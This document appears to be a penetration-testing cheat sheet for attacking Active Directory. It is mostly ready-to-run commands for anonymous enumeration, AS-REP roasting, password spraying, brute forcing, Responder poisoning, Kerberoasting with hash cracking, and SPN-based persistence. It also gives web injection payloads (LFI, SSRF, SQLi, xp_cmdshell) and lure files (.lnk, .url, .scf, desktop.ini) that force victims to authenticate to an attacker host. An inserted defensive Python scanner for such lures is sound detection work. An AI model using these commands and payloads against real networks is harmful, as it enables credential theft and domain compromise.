Active Directory

AD enum (NO creds/sessions)

Basic recon

nxc smb <target>
enum4linux -a <target>
nmap -n -sV --script "ldap* and not brute" -p 389 <target>

SMB enum

# null session
nxc smb <IP> -u '' -p '' --shares
# guest
nxc smb <IP> -u 'guest' -p '' --shares
# null session
smbclient -N -L //<target>
# guest
smbclient -U 'guest%' -L //<target>
# connect to a share
smbclient [-U 'guest%'] [-N] //<target>/<share>
# null session
smbmap -H <target>
# guest
smbmap -u 'guest' -p '' -H <target>
# recursive listing
smbmap [-u 'guest' -p ''] -H <target> -r [<share>]

User enum

# kerbrute
kerbrute userenum -d <domain> [--dc <target>] users.txt
# smb/rpc/ldap
nxc smb <target> [-u 'guest' -p ''] --users
rpcdump.py [[domain/]guest:@]<target>
# rid cycling
nxc smb [-u 'guest' -p ''] --rid-brute <target>
lookupsid.py [-no-pass] [[domain/]guest:@]<target>
# <domain-sid> is the domain SID (S-1-5-21-...); the RID is appended after the last dash
seq 500 1500 | xargs -P 50 -I{} rpcclient -U 'guest%' <target> -c 'lookupsids <domain-sid>-{}'

With valid username list

  • AS-REP Roast

GetNPUsers.py -no-pass -usersfile valid_users.txt <domain>/

  • Password Spraying/Brute Forcing

# brute forcing
nxc smb <target> -u valid_users.txt -p passwords.txt
kerbrute bruteuser -d <domain> [--dc <target>] passwords.txt '<user>'

# password spraying
nxc smb <target> -u valid_users.txt -p '<password>'
kerbrute passwordspray -d <domain> [--dc <target>] valid_users.txt '<password>'

Capturing NTLM hashes

Network poisoning

responder -I <interface>

Possible Attacks

https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/

  • Via web vulnerability

If you discover a web vulnerability (such as LFI, SQLi, XXE, SSRF, SSTI) that makes the server fetch a remote path, you can point it at a UNC path so that the server authenticates to your host, which leaks the NetNTLM hash of the account running the process. For example:

# LFI
?page=\\10.10.10.10\test

# SSRF
?url=file://10.10.10.10/test

# SQL Injection
?id=1' union select null,load_file('\\\\10.10.10.10\\test'),null-- -
# MSSQL
?id=1' union select null,(select x from OpenRowset(BULK '\\10.10.10.10\test',SINGLE_CLOB) R(x)),null-- -
# MSSQL, stacked query (EXEC cannot be used inside a UNION SELECT)
?id=1'; EXEC xp_cmdshell 'dir \\10.10.10.10\test'-- -

  • Shortcut.lnk File

# Create a shortcut.lnk with PowerShell
$targetPath = "\\10.10.10.10\test"
$shortcutPath = "C:\path\to\your\~shortcut.lnk"
$WScriptShell = New-Object -ComObject WScript.Shell
$shortcut = $WScriptShell.CreateShortcut($shortcutPath)
$shortcut.TargetPath = $targetPath
$shortcut.Save()

  • Shortcut.url File

# Create a shortcut.url with PowerShell
echo '[InternetShortcut]' > ~shortcut.url
echo 'URL=file:///\\10.10.10.10\test' >> ~shortcut.url

  • SCF File

echo '[Shell]' > ~file.scf
echo 'Command=2' >> ~file.scf
echo 'IconFile=explorer.exe,3' >> ~file.scf
echo '[Taskbar]' >> ~file.scf
echo 'Command=ToggleDesktop' >> ~file.scf
echo '[InternetShortcut]' >> ~file.scf
echo 'URL=file:///\\10.10.10.10\test' >> ~file.scf

  • Desktop.ini File

echo '[.ShellClassInfo]' > desktop.ini
echo 'IconResource=\\10.10.10.10\test' >> desktop.ini
attrib +s +h desktop.ini
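As an added defender-side example (not part of this cheat sheet), the scanner below walks a folder or mounted share for the lure file types listed above and flags any whose icon, URL or target points at a UNC path. The host 10.10.10.10 and file names come from the snippets above; the .lnk check is a string search, not a full parse of the binary format.

```python
"""Scan a folder (e.g. a mounted share) for NTLM-coercion lure files of the kinds
shown above whose icon, URL or target points at a UNC path. Added defensive example."""
import os
import re

# INI keys that Explorer resolves automatically when the folder is browsed.
INI_KEYS = {".scf": ("iconfile", "url"), ".url": ("url", "iconfile"),
            "desktop.ini": ("iconresource", "iconfile")}
# \\host\share, optionally written as file:///\\host\share
UNC_RE = re.compile(r"(?:file:/*)?\\\\([^\\\s]+)\\", re.IGNORECASE)

def scan_text(name, data):
    """Return the UNC host an INI-style lure points to, else None."""
    low = name.lower()
    keys = INI_KEYS.get(low if low == "desktop.ini" else os.path.splitext(low)[1])
    for line in data.decode("utf-8", "ignore").splitlines() if keys else ():
        key, _, val = line.partition("=")
        if key.strip().lower() in keys:
            m = UNC_RE.search(val.strip())
            if m:
                return m.group(1)
    return None

def scan_lnk(data):
    """Heuristic .lnk check: the target is stored as ANSI and/or UTF-16LE text."""
    for text in (data.decode("latin-1"), data.decode("utf-16-le", "ignore")):
        m = UNC_RE.search(text)
        if m:
            return m.group(1)
    return None

def scan_file(name, data):
    """Dispatch on the file name; returns the UNC host or None."""
    if name.lower().endswith(".lnk"):
        return scan_lnk(data)
    return scan_text(name, data)

def find_lures(root):
    """Walk root and return [(path, unc_host)] for every suspicious file."""
    hits = []
    for d, _, files in os.walk(root):
        for f in files:
            path = os.path.join(d, f)
            with open(path, "rb") as fh:
                host = scan_file(f, fh.read(65536))  # lure files are tiny; cap the read
            if host:
                hits.append((path, host))
    return hits
```

Run find_lures() against a mounted share; a hit on a writable share is a strong sign someone planted a coercion lure, and the returned host is the listener to block and hunt for.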

AD enum (WITH creds/sessions)

BloodHound enum

Install and configure neo4j and BloodHound on your machine, then start them:

# neo4j
export JAVA_HOME=/usr/lib/jvm/java-11-openjdk/ && neo4j console
# bloodhound
bloodhound

SharpHound

https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors

# EXE
.\SharpHound.exe -CollectionMethods All
# PS1
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethods All -OutputDirectory .

Kerberoast

If you get this error on Linux: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great), your local clock is too far from the DC's and you need to synchronise the host with the DC. A few options:

ntpdate <target>
rdate -n <target>

Attack

GetUserSPNs.py -request [-dc-ip <target>] <domain>/<user>:<password>

Cracking

john --format=krb5tgs --wordlist=passwords.txt hashes
hashcat -m 13100 --force -a 0 hashes passwords.txt

Persistence

https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1

# PowerView
Set-DomainObject -Identity <username> -Set @{serviceprincipalname='test/test'} -Verbose
